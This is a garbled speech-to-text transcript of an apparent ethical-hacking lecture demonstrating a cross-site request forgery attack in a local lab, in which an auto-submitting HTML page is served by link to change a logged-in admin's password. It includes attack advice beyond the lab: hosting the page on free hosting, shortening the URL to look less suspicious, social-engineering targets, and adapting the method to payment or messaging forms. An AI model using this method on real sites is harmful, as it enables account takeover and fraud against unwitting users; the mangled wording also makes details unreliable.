Lecture Transcript - Exploiting CSRF Vulnerabilities To Change Admin Password Using Link

And the previous lecture, we seen how to create a hastier malware page that exploits SRF vulnerability,

that would automatically submit a form, and we see how we can exploit it to get the target person to

change their password without them even knowing.

So as soon as they double click the file, this form will be automatically submitted, changing the

password to the password that we want.

One problem with that is it's usually a bit difficult to get people to run files, even though it's

just the HTML file and you can use smart social engineering skills to get them to run it.

It's still a bit difficult and it will be much easier if we can just send them a link, which will change

their password as soon as they click on that link.

And this is actually really easy because the file we created is a hasty e-mail file.

So all we have to do is just upload that file to a Web hosting company.

Now there is a lot of free Web hosting online.

You can just upload that file there.

You can use your URL shortening service as well to make the URL shorter and less suspicious and then

you can send it to the target person.

So I'm going to show you how to do that.

But I'm actually going to do it on my local machine because everything for me here is local, but it

works on the external websites exactly the same.

You'll just have to upload to the page on a web hosting.

Doesn't matter if it's free or paid, but there is a lot of free ones.

So I'm going to use my local Apache server right here and then we're going to browse it from our target

Windows machine and we'll see how that is going to be executed and how the password is going to be changed.

So before I do anything, I'm actually just going to reopen the file and I'm going to set the password

to seven seven seven seven seven seven instead of sixty six.

So we just know that the password has been changed to the new one.

And I'll change it in here as well.

And now I'm going to copy this to my local Web server and Carly.

First of all, I'm going to copy the file to my document through it, so the file is stored in desktop

now, so I'm going to do C.p.

Desktops, yes, RF.

To var w w w tml.

And now I'm going to start my Apache's, so I'm going to do a service Apache to start.

Now everything's working, so I'm just going to get my IP address.

And my IP address is 10, 20, 14 to 13, so I'm just going to go to a Windows machine.

Now, in this machine, I'm actually pretending to be a target user, so first of all, I have to be

logged in to my account.

So I'm just going to go to a.

So I'm going to login with my username, which is Admon.

And I'm going to login with my old password, which is or to my current password, the one that will

reset it previously, which is six, is.

Now, as you can see, I can log in normally.

Now, I'm going to go I'm going to close this.

Now we're going to browse to the page that contains the first six hour exploit, so we're going to pretend

that I was social engineer and someone gave me a you are able to click.

So at the moment, we're actually not going to download any file.

We're not going to double click any file.

All we're going to do is literally just browse a new URL.

And once we do that, our password is going to be changed.

So the page, as I said, you can host it on free hosting.

There is a lot of free hosting online at the moment.

I have it hosted on my candy machine.

And it's IP is 10, 20, 14 to 13.

And then I'm going to put my the name of the page which was set to see US Aftertaste HTML.

I'm going to hit enter.

And as you can see, it's telling me that the password has been changed and all I did again, all I

did is just run and you are also all down to you to how you're going to convince your target to execute

that are.

So if I just log out now and log in again.

You see that my password now I have to log in with admin and I'm actually going to type the password

here, so it's seven seven seven seven seven seven.

And I'm going to copy all of this and paste it down there just so that you actually know that the password

has been changed to seven seven seven seven.

So the vulnerable you are Alvar's 10, 2014 to 13 forward slash SRF.

Anybody who would run this your L and logged into the target website, they'll be forced to change their

password to seven seven seven seven seven seven.

Now you can use this method, as I said, with any website that is vulnerable to SRF and it'll force

the user to do any action you want.

All you have to do is just adopt the same method to the form.

So whether it's payment form, whether it's a sign up form, whether it's a submit article for whether

it's a form that sends a message to a friend, you can just change the website.

Right.

Click inspect the form aliment, copy the form code, hide everything.

The JavaScript code that submits the website that submits the form automatically.

Then you can send the what the email website as it is to the target person, or you can upload it to

an online hosting and then just send the hosting URL to the target person.

Once they browse that you are allowed, the web page will be automatically executed, forcing them to

change their password or to do the action that you want them to do.